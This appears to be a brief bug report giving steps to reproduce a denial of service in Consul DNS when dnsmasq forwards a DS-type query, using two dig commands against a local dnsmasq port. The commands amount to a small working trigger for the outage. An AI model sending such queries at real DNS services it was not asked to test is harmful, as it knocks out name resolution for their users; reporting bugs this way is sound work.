Breaking consul DNS with dnsmasq forwarding
- Find the UDP port that dnsmasq is listening on (
- Send a DNS query.
dig @127.0.0.1 -p <dnsmasq port> A consul.service.consul (This works and resolves to 127.0.0.1)
dig @127.0.0.1 -p <dnsmasq port> DS consul.service.consul (This does not work and times out in dig)
- Have a look at your consul and dnsmasq logs. You have now successfully DoS'ed consul and dnsmasq DNS.